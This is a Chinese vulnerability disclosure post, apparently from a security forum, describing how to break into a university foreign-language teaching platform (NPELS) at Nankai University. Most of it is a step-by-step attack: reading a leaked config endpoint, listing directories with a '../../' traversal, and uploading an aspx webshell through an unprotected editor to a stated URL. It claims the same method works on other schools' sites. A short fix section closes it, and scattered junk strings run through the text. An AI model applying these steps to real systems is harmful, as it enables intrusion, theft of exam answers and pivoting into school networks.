新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
+ M5 ~! D% G+ I: S
详细说明：
) f% [6 S- p, V7 v4 J* t5 A
以南开大学的为例:
' E7 M2 Q+ n' b: [2 E0 U( ~http://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
3 Y9 V! k8 ^* R# L2 n/ L% I. j$ @<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
7 H  c2 q* a* p) e6 {' G7 \! w及版本号
<add key="TVersion" value="1, 0, 0, 2187">
( W6 `3 q" O, W1 h7 J+ y1 s</add>
直接访问
0 U# B+ H8 {" f+ B8 Whttp://222.30.60.3/NPELS/CommonService.asmx
. @8 L, R8 O7 ~7 G使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
2 J1 t9 f9 B0 x, nhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
- a9 a5 q& @- ~- b/ l' u7 T* D
发现
) q- C9 u: V% E1 b+ Mhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
7 Z! p" |' j2 A, A上传后继续列目录找到木马地址直接访问即可

* E4 |  [8 g& ~4 ^3 {3 ^OOXX
7 N4 Z3 D" `7 k( v. o, X* [
Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
- O/ M1 X% K* q* x* C2 l漏洞证明：

列目录：
6 s4 Z& N, q4 N! lhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
http://222.30.60.3/npelsv/editor/editor.htm
# V0 X1 r8 X3 o/ L: E+ I
上传木马：
1 I8 o* A: M  E3 S. t- B$ phttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
' b2 t$ V+ ^5 q: C
修复方案：
好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
" k$ Z# e4 f: _3 V/ e9 Z, j并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
0 Q; j' D: m, f, n/ x